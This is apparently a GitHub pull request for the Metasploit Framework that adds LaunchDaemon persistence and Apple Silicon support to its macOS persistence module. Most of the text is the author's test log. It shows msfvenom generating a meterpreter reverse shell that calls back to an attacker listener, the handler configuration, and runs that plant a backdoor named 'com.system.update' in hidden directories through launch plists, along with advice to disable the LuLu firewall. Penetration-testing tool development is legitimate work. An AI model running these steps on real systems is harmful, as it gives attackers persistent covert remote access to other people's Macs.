Add LaunchDaemon Persistence to exploits/osx/local/persistence.rb

[gardnerapp]

According to The Art of Mac Malware Launch Items are able to persist as LaunchAgents or LaunchDaemons, this pull request adds LaunchDaemon persistence to exploits/osx/local/persistence.rb by writing a plist file to ~/Library/LaunchDaemons. One of the advantages of persisting as a LaunchDaemon is that they run before user login and with elevated permissions. Additionally this pull request adds the ability for the module to target Apple Silicon devices.

As part of the testing I used BlockBlock to catch the plist entry being written. Note if you're using something like LuLu it needs to be turned off as it will catch and terminate meterpreter/shell connections.

I've tested both LaunchAgent and LaunchDaemon persistence with this module on an Apple Silicon device.
$ uname -a Darwin corey.local 23.1.0 Darwin Kernel Version 23.1.0: Mon Oct 9 21:28:12 PDT 2023; root:xnu-10002.41.9~6/RELEASE_ARM64_T8103 arm64

We start by generating a meterpreter:

$ ../metasploit-framework/msfvenom -p osx/aarch64/meterpreter_reverse_tcp  LHOST=192.168.0.239 LPORT=4444 -o payload -f macho
[-] No platform was selected, choosing Msf::Module::Platform::OSX from the payload
[-] No arch selected, selecting arch: aarch64 from the payload
No encoder specified, outputting raw payload
Payload size: 813091 bytes
Final size of macho file: 813091 bytes
Saved as: payload

Start a listener and reload the module:

msf6> reload_all
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.0.239
lhost => 192.168.0.239
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > set payload osx/aarch64/meterpreter/reverse_tcp
payload => osx/aarch64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run

Run the meterpreter -> 10:48:22 ~/Desktop $ chmod +x payload && ./payload

background the session and start to configure the options for persistence.rb

meterpreter> bg
msf6 exploit(multi/handler) > search osx persistence

msf6 exploit(multi/handler) > use 0
[*] No payload configured, defaulting to osx/x64/meterpreter/reverse_tcp
msf6 exploit(osx/local/persistence) > set target 3
target => 3
msf6 exploit(osx/local/persistence) > set session 2
session => 2
msf6 exploit(osx/local/persistence) > set payload osx/aarch64/meterpreter_reverse_tcp 
payload => osx/aarch64/meterpreter_reverse_tcp
msf6 exploit(osx/local/persistence) > set lhost 192.168.0.239
lhost => 192.168.0.239
smsf6 exploit(osx/local/persistence) > set lport 1234
lport => 1234

Test w LaunchAgent, note that exploit doesn't technically "complete" because RUN_NOW is false. The plist entry and executable are dropped on the system though as shown by the pictures below.

msf6 exploit(osx/local/persistence) > run
[*] Started reverse TCP handler on 192.168.0.239:1234 
[*] Dropping backdoor executable...
[+] Backdoor stored to /Users/corery/Library/.vRzmesOZ/com.system.update
[+] LaunchAgent added: /Users/corery/Library/LaunchAgents/com.system.update.plist
[+] LaunchAgent installed successfully.
[*] To remove the persistence, run:
rm -rf /Users/corery/Library/.vRzmesOZ ; rm /Users/corery/Library/LaunchAgents/com.system.update.plist ; launchctl remove com.system.update ; launchctl stop com.system.update

[*] Exploit completed, but no session was created.

Now we test LaunchDaemons by setting `LaunchItem':

msf6 exploit(osx/local/persistence) > set LAUNCH_ITEM LaunchDaemon
LAUNCH_ITEM => LaunchDaemon
msf6 exploit(osx/local/persistence) > run

[*] Started reverse TCP handler on 192.168.0.239:1234 
[*] Dropping backdoor executable...
[+] Backdoor stored to /Users/corery/Library/.hsKpBATL/com.system.update
[+] LaunchAgent added: /Users/corery/Library/LaunchDaemons/com.system.update.plist
[+] LaunchAgent installed successfully.
[*] To remove the persistence, run:
rm -rf /Users/corery/Library/.hsKpBATL ; rm /Users/corery/Library/LaunchDaemons/com.system.update.plist ; launchctl remove com.system.update ; launchctl stop com.system.update

[*] Exploit completed, but no session was created.

[github-actions]

Thanks for your pull request! Before this pull request can be merged, it must pass the checks of our automated linting tools.

We use Rubocop and msftidy to ensure the quality of our code. This can be ran from the root directory of Metasploit:

rubocop <directory or file>
tools/dev/msftidy.rb <directory or file>

You can automate most of these changes with the -a flag:

rubocop -a <directory or file>

Please update your branch after these have been made, and reach out if you have any problems.

[dwelch-r7]

Suggested change

	['Mac OS X Apple Sillicon', {'Arch' => ARCH_AARCH64, 'Platform' => ['osx'] }],
	['Mac OS X Apple Silicon', {'Arch' => ARCH_AARCH64, 'Platform' => ['osx'] }],

[adfoster-r7]

Release notes

Adds a new LAUNCH_ITEM option to the exploits/osx/local/persistence module. The allowed values are LaunchAgent or LaunchDaemon. One of the advantages of persisting as a LaunchDaemon is that they run before user login and with elevated permissions. Additionally this pull request adds the ability for the module to target Apple Silicon devices.

[adfoster-r7]

Super cool, thanks!